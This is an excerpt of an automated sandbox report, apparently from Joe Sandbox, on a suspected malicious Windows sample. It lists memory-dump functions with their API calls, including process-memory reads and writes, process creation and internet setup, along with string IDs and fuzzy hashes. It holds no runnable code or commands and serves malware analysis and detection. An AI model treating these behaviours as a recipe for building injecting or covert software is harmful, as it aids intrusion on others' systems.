                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #
                                                                                                                        • API String ID: 0-1885708031
                                                                                                                        • Opcode ID: ebd096cdad5b00089a014a309f1720a9cd61dbfbeafd85f61edb94e74676f74a
                                                                                                                        • Instruction ID: 66adfff15f52614cec2f1f134505b049b2068563e8ecacdaee075e01aa8943b8
                                                                                                                        • Opcode Fuzzy Hash: ebd096cdad5b00089a014a309f1720a9cd61dbfbeafd85f61edb94e74676f74a
                                                                                                                        • Instruction Fuzzy Hash: A1513339502296DFDF15DF28D086AFA7FA8FF66310F644055E8929B2C0D6349D82CBA0
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0052F2A2
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0052F2BB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                        • Opcode ID: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
                                                                                                                        • Instruction ID: c7a2995c9ab9ec5f6a5ad5f1cdfd9c427da7dc9de0f0fd6f0e4bc561255378ce
                                                                                                                        • Opcode Fuzzy Hash: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
                                                                                                                        • Instruction Fuzzy Hash: 95514971408B499BE320AF14DC8ABABBBF8FFD9300F81485DF1D941195EB318569CB66
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005729EB
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00572A8D
                                                                                                                          • Part of subcall function 00572C75: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00572CE0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 89b5d1cb788e8e3fcde0eb255877522e9bf222e5f6346890409146c1026357dc
                                                                                                                        • Instruction ID: 9761ff7e9162e5abb79856990daf07c9d7d5ebb9f6a39a43a85da2295f43b6ed
                                                                                                                        • Opcode Fuzzy Hash: 89b5d1cb788e8e3fcde0eb255877522e9bf222e5f6346890409146c1026357dc
                                                                                                                        • Instruction Fuzzy Hash: DA41A470A00209ABEF25DF54D859BEE7FB9FF84710F044429F909A3291DB709E84DB92
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 005957E0
                                                                                                                        • _wcslen.LIBCMT ref: 005957EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                        • Opcode ID: 4c7374515d6a575ef49dd4067d61b4ca6bbcf62f38d25066da1e83756f1d7315
                                                                                                                        • Instruction ID: 1c137534ec4c76d0c473b9da2367f8f55f118cdcbbcc352f0b521fcfa437f5d1
                                                                                                                        • Opcode Fuzzy Hash: 4c7374515d6a575ef49dd4067d61b4ca6bbcf62f38d25066da1e83756f1d7315
                                                                                                                        • Instruction Fuzzy Hash: 42418071A0010A9FCF15DFA9D8899EEBFF5FF99320F244069E505A7291E7309D91CB90
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 0058D130
                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0058D13A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                        • String ID: |
                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                        • Opcode ID: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
                                                                                                                        • Instruction ID: 20de1884158e0cb95b0cdf2d8ee3d4ff1b41bc96ce37ac12595cdfae6ab8a7f9
                                                                                                                        • Opcode Fuzzy Hash: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
                                                                                                                        • Instruction Fuzzy Hash: 91311A71D0020AABDF15EFA4CC89AEFBFB9FF44300F000119F815A6165DB31AA56DB60
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 005A3621
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005A365C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 005A461F
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A4634
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005533A2
  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
APIs
• SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00572884
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005728B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
APIs
  • Part of subcall function 00573D03: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00573D18
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00573C23
• _strlen.LIBCMT ref: 00573C2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend$Timeout_strlen
• String ID: @U=u
• API String ID: 2777139624-2594219639
APIs
  • Part of subcall function 0057ED19: GetLocalTime.KERNEL32 ref: 0057ED2A
  • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057ED3B
  • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057ED79
  • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EDAF
  • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EDDF
  • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EDEF
  • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EE2B
• SendMessageW.USER32(?,00001002,00000000,?), ref: 005A340A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _wcslen$LocalMessageSendTime
• String ID: @U=u$SysDateTimePick32
• API String ID: 2216836867-2530228043
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572178
  • Part of subcall function 0057B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0057B355
  • Part of subcall function 0057B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B365
  • Part of subcall function 0057B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B37B
  • Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
• SendMessageW.USER32(?,00001073,00000000,?), ref: 005721DF
  • Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
• String ID: @U=u
• API String ID: 1045663743-2594219639
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005A327C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A3287
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
  • Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
  • Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
• GetWindowRect.USER32(00000000,?), ref: 005A377A
• GetSysColor.USER32(00000012), ref: 005A3794
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
APIs
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005A61FC
• SendMessageW.USER32(?,00000194,00000000,00000000), ref: 005A6225
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0058CD7D
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0058CDA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
• SendMessageW.USER32(?,?,?,?), ref: 005A4FCC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 005A3147
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u$button
• API String ID: 3850602802-1762282863
APIs
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
• CharUpperBuffW.USER32(?,?,?), ref: 00576CB6
• _wcslen.LIBCMT ref: 00576CC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
APIs
  • Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
• SendMessageW.USER32(?,0000102B,?,00000000), ref: 0057243B
• SendMessageW.USER32(?,0000102B,?,00000000), ref: 0057245E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend$MemoryProcessWrite
• String ID: @U=u
• API String ID: 1195347164-2594219639
APIs
• SendMessageW.USER32(?,0000133E,00000000,?), ref: 005A43AF
• InvalidateRect.USER32(?,00000000,00000001,?,?), ref: 005A4408
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: InvalidateMessageRectSend
• String ID: @U=u
• API String ID: 909852535-2594219639
APIs
• SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00572531
• SendMessageW.USER32(?,0000040D,?,00000000), ref: 00572564
  • Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend$MemoryProcessRead_wcslen
• String ID: @U=u
• API String ID: 1083363909-2594219639
• Opcode ID: d17f4134213f96ca80fb91de24cd8f623c52bfb01e802f5132f76fa6234a0749
• Instruction ID: e6d5d89768519da2c9c260b4bbbc8bba5980cd1a662430eed823d9d6473b024d
• Opcode Fuzzy Hash: d17f4134213f96ca80fb91de24cd8f623c52bfb01e802f5132f76fa6234a0749
• Instruction Fuzzy Hash: 79016D71900119AFEB50EF94DC95EED7BACFB64340F80C0A5F649AB150DE305E88DB90
APIs
• __Init_thread_footer.LIBCMT ref: 0052A529
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
Strings
Similarity
• API ID: Init_thread_footer_wcslen
• String ID: ,%^$3yV
• API String ID: 2551934079-817577063
• Opcode ID: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
• Instruction ID: 7c970d733234b0c6971b9745d9ffd2b6b1bc791d4476596c126bdaaeb97af815
• Opcode Fuzzy Hash: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
• Instruction Fuzzy Hash: 6401F73270066197CE08F768E86FA9E7F68BF86710F401425F9025B1C2DE509D458AD7
APIs
  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
• DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0056769C,?,?,?), ref: 005A9111
  • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 005A90F7
Strings
Similarity
• API ID: LongWindow$MessageProcSend
• String ID: @U=u
• API String ID: 982171247-2594219639
• Opcode ID: 11b5ef4bde037607f59e94918fe6908e22db23659264ebb73729225f4baf3cb3
• Instruction ID: 0fa4651ccdebed4f0b1a18731d5e397e7ede18a32d9617b9880877b39e981fdb
• Opcode Fuzzy Hash: 11b5ef4bde037607f59e94918fe6908e22db23659264ebb73729225f4baf3cb3
• Instruction Fuzzy Hash: FC01BC34204225ABDB259F14DC89EAA3FE6FF87365F100428F9550B2E1CB326845DB60
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005E3018,005E305C), ref: 005A81BF
• CloseHandle.KERNEL32 ref: 005A81D1
Strings
Similarity
• API ID: CloseCreateHandleProcess
• String ID: \0^
• API String ID: 3712363035-3379709126
• Opcode ID: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
• Instruction ID: 199575348d26d12ddfc890ce9e6295e2c54b067e2b0307b05e0c5fef0570b743
• Opcode Fuzzy Hash: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
• Instruction Fuzzy Hash: AAF089B1640340BEE7246761AC4DFB73E9CEB15750F000461FB48DB1A1D6758E14A3F4
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572480
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00572497
  • Part of subcall function 005723DB: SendMessageW.USER32(?,0000102B,?,00000000), ref: 0057243B
Strings
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
• Opcode ID: 6e189181f0dab11b99e0d497d292a838ae1ef30b59199a979458161d1bc60889
• Instruction ID: af1af339c25da53314a31d07aa113ce24689494d70bdc41a5fd740425ad1f828
• Opcode Fuzzy Hash: 6e189181f0dab11b99e0d497d292a838ae1ef30b59199a979458161d1bc60889
• Instruction Fuzzy Hash: 3BF0E230601121BAEF205B1ADC0ECDFBF6DEF96760F104014B409A6151CAA15D41E7E0
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: 3, 3, 16, 1
• API String ID: 176396367-3042988571
• Opcode ID: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
• Instruction ID: 0dbe8ab5f30028e2020a1f2af57ed84f5bd2056c98449352165aaefa24bcd8b5
• Opcode Fuzzy Hash: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
• Instruction Fuzzy Hash: 5FE02B03225321109B3112799CC5B7F5F8DFFCD760B14182BF989C2267EAA49D9193A0
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00572BFA
• SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00572C2A
Strings
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
• Opcode ID: 4b858b467d1ef3224f8c28c241ba5c80f3a9df0360f97c80c1572a10b0960b81
• Instruction ID: 12a14f69b63b6ae8f9572a3f81beaa079806676cfbb11216b17885bd46ab7a22
• Opcode Fuzzy Hash: 4b858b467d1ef3224f8c28c241ba5c80f3a9df0360f97c80c1572a10b0960b81
• Instruction Fuzzy Hash: C9F08C75240304BBFB126A84AC4AFAA3F5CBB65761F004014B7495E091CAA25C40A7A0
APIs
  • Part of subcall function 0057286B: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00572884
  • Part of subcall function 0057286B: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005728B6
• SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00572D80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00572D90
Strings
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
• Opcode ID: eed4dbad25c5d49d361ed7c6de48adf35c045f0f88f60ce4eae51cf7acef72ef
